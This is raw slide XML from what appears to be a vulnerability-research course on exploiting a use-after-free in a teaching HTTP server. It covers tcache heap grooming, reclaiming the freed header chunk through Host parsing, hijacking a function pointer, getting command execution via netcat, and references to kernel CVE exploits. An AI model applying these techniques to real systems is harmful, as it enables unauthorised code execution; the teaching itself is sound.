              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rn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Additionally, no objects with pointers are getting freed as well.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only use ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ and ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ when using the ‘Connection’ header.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842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source code to show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9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03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Unsorted/small/large bin chunks CANNOT be next to the top chunk. Makes this a WHOLE LOT HARDER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00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Breakpoint before and after the allocation for the uninitialized memory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something that will NOT consolidate with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>top_chunk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7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47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Breakpoint before and after the allocation for the uninitialized memory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something that will NOT consolidate with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>top_chunk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22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 100% careful calculation yet…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Allocate big chunks via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parse_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function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Place large sized values into random values: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Parameters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Path,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63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this for all variables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699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83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Modify the request according to the header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26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Goal of the connection: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Make a persistent connection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Drop headers for each hop		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This feature led to a specification defined HTTP smuggling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711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 after free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842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Segfault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from ‘name’ being blank (0)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272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Attempts to read ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>custom_callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ value from ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>req_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[index]’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Leads to the out of bounds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06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Both viable options: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Fd poison with double free #3 would amazing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Used double free #3 for a leak by freeing the response body string. Neat!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Living off the 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9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Describe things in the picture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be a BODY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400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Story of people living off berries, trees and things.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your surroundings to exploit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05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At the end of the day, you have a bug in ONE spot. But, you have a near infinite amount of objects around to attack.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What makes a good target object to exploit?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What if we had a buffer overflow vulnerability – for the struct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082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 the Linux networking stack as a timer. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xz.aliyun.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/t/3455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99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After the ‘spray’ object, talk about WHAT makes an ideal object for this. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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LakshmiDesai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/CVE-2016-8655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149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xairy.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/articles/2017/cve-2017-6074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xairy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/kernel-exploits/tree/master/CVE-2017-6074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814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Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt Player struct in our exercise for UAF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Could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892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3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Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt Player struct in our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exercise for UAF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Could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743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at objects as a means to an exploitation end now. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brings you to the next level of exploitation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4350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Much of it is contextual though – can we even USE some object at this point in the code?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48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going from MAIN to ‘serve’ for the webpage.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Fork – parent vs. child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serve_main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functionality overview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server.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – important data structures: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Headers, first line, etc.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routes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Global variables such as header and things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Defining routes in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’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Returning data from a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53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105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838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75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590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Similar to UAF exercise!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686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3029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Freed chunk goes into the 0x30 TCache bin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after free on the header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489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990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we can allocate to trigger a REALLY nice overwrite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141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Host, Origin and User-Agent all have the same exact functionality.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09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Source = input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Sink = problem code  - calls to system or such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34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484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809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020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3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90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Accidental bug that I wrote… and, it’s exploitable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240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Overflow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>numSyms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> variable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197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Create a buffer that is TOO small.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Write the data to this location. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wildcopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – but there IS a way to escape this.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NSO took this to arbitrary code execution by creating a weird machine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64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Is this even triggerable?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Integer overflow would have to send 2GB of data to do…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05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Take the current size, the new string size and multiple this by 2.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an allocation with this new size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Memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the original data into new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Free our old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Overflow in the MATH for the new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21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258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Take the current size, the new string size and multiple this by 2.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an allocation with this new size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Memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the original data into new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Free our old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Overflow in the MATH for the new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968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Tiny buffer with a HUGE string will always trigger a crash.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WRITE here, to put the old data in the new buffer, will use the OLD string size for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931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Tiny buffer with a HUGE string will always trigger a crash.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WRITE here, to put the old data in the new buffer, will use the OLD string size for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845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Controlled size buffer overflow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809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this!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First ‘X-Request-Id’ as the data being used in the overflow.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The second one triggers the overflow. ﻿0x55555555ebe0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this for all variables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0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4/16/22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mojipedia.org/fir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5.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83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customXml" Target="../ink/ink13.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId30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46F0-09EE-204A-A362-8F838768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7"/>
            <a:ext cx="8209394" cy="2139553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Final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5E06C-29C1-ED42-9BB8-0049186C2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Entering the world of vulnerability research</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292320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https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC803A79-423D-0D42-9FE2-D4EBF6AAF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51" y="0"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reponses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B41523-2552-6449-BBBE-8BE96609F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11" y="690830"/>
            <a:ext cx="7279689" cy="474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388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6B2A-1853-DC4C-8F91-DA7FFFFD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UAF Solution Throwback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C1B062E6-0C7D-E74D-BA47-2E2CA236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37" y="1369219"/>
            <a:ext cx="5686263" cy="25155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71F73-3DDC-104B-BA9C-1D75C1191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02936"/>
            <a:ext cx="4252404" cy="3963420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PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt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Player Struct</a:t>
            </a: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UAF object gets corrupted by another object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4061692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Create Exploit Plan!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8" y="1236540"/>
            <a:ext cx="8399849" cy="93216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Trigger use after free on header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0x30 TCache bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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struct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timer_lst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similar to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struct header</a:t>
            </a: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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769856FC-6B2E-CD40-A51B-53165A08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387" y="2154116"/>
            <a:ext cx="4902200" cy="2489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FB61B5-1C4C-9349-9CED-77518D51E295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4694175" y="4235236"/>
            <a:ext cx="408493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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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4F7F2D-5DA3-A441-89E0-ED5FB7258354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209456" y="2203634"/>
            <a:ext cx="3892630" cy="1983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Swap in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1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fake object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into header slot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Call function pointer for the win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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Use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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> for command</a:t>
            </a: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A6B4B57-A0EA-D947-AC90-B71FBEF5C5F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139713" y="4516719"/>
            <a:ext cx="3750360" cy="62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Exploit similar to </a:t>
            </a:r>
            <a:b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b="1" dirty="0"/>
              <a:t>CVE-2016-8655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100DCE-9FDA-3141-9B42-91F2B3A51BCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7538602" y="3146971"/>
            <a:ext cx="254143" cy="80735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32953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7190984" y="2832637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 Pointer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3413CD-2EE2-AF4C-8FA7-FB902645CFCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6413953" y="2534347"/>
            <a:ext cx="684271" cy="18786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B70131-6B53-854D-B0B1-121A1039CBA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7040312" y="2251207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Parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1680327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63EF-1F57-DC44-ADE0-F6B0CF01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Chunk – 0x30 TCache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="TCache bins">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45BA56C1-2F8B-B943-BC1B-51A3778B7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1" r="47855"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7679412" y="0"/>
            <a:ext cx="1464588" cy="4224669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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D7E155-EAEF-BE47-9C3E-13D0CE2C5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13"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1366711"/>
            <a:ext cx="7722562" cy="280233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A9E69A-2251-3B4E-9530-9FB9ECE30FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053884" y="2166212"/>
            <a:ext cx="563363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2D9E05-3E6F-7540-8AD3-BB9C0DAB2027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2056881" y="3682463"/>
            <a:ext cx="25693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BD0CB8-C7F2-D54A-A7E0-71742CD47AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3682463"/>
            <a:ext cx="75844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175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Plan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8" y="1236541"/>
            <a:ext cx="8399849" cy="562130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Free the header to trigger UAF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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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2953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090475" y="2282294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 Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Header is free - in the TCache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C23C957-81DE-F54B-82F2-D578ED1D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532659"/>
            <a:ext cx="6710766" cy="30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301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85AB-D1A4-8C49-BB29-45F3DCEC7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Target Allocation Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="target-acquired |">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9023DEFA-2BB7-EC4E-8989-D6FB2A71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010856"/>
            <a:ext cx="3886200" cy="198022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CD24B-53C8-AF4C-B9AB-7E5437CD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2" y="1092631"/>
            <a:ext cx="3886200" cy="3949669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control the data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to control information being used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x30 in size: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Receive the proper chunk from the bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Callable after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Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Free </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>interpret_single_header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42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Plan –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9" y="1236540"/>
            <a:ext cx="4695756" cy="1151512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Allocate same chunk</a:t>
            </a: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Two pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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own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the same memory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1B68D-4353-E44B-B5B8-EBBD6C3F8211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="23880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3E682D-D991-0D42-8192-D0F4960CA02C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209457" y="2311418"/>
            <a:ext cx="3822885" cy="281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2953C-2AE9-DE4E-AA3B-31A3A5EF6297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090475" y="2282294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 Pointer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330EFE4-D847-C74B-BAB0-A0AB5F25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00" y="1268019"/>
            <a:ext cx="5727770" cy="3325801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6EE6FE7-050D-2546-B7B9-95A62B981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94" t="49807" r="5966" b="25415"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865747" y="3625860"/>
            <a:ext cx="1743560" cy="824052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9BC8CB-5B02-1A46-ABD5-D58B5BDCC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" y="2388052"/>
            <a:ext cx="3463685" cy="17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017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EEDB-A3D3-5A4E-AB7D-E321DCD9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Host Setting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Parse host of request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D7AFA2C-8AB6-AE4E-8798-ECB4679C2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597" y="2035485"/>
            <a:ext cx="8815778" cy="1925691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C62322-6486-1441-B558-71C6A0C2A3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870543" y="2775812"/>
            <a:ext cx="478562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33EEE5-9234-1640-BDED-F2F3DD805174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572359" y="3028358"/>
            <a:ext cx="293692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C788C7-58A6-1A42-9623-F1DF2192E45B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245818" y="1658319"/>
            <a:ext cx="0" cy="91343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1A9D73-C483-8646-B64C-83B1D80992AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5858358" y="1081627"/>
            <a:ext cx="285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Allocation Size </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0x30 chunk easy)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6264C4-6DF1-E749-A561-D1293D1A3B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2766447" y="3001342"/>
            <a:ext cx="805912" cy="95983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C510A0-B476-204D-A9C3-0D24FDC051C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720312" y="3945537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Controlled Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2977503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85AB-D1A4-8C49-BB29-45F3DCEC7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Target Allocation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CD24B-53C8-AF4C-B9AB-7E5437CD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3597" y="1092631"/>
            <a:ext cx="8211755" cy="3949669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control the data ✔️:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to control information being used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x30 in size ✔️: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Receive the proper chunk from the bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Callable after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Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Free ✔️</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Parse host of request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E0DF88-C884-0D4B-8B7A-20D012DED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11" y="3217809"/>
            <a:ext cx="8815778" cy="1925691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E5720D-A8AA-6B47-A6CC-9DC62738C4E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630319" y="3945934"/>
            <a:ext cx="478562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F13283-1DAC-2242-AA99-84F9E060C7EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378630" y="4206230"/>
            <a:ext cx="293692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0AD930-7B3E-2444-8029-1708CA3467DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69742" y="4073272"/>
            <a:ext cx="43920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EC804F-DBEC-CD40-B818-DEC802C93452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
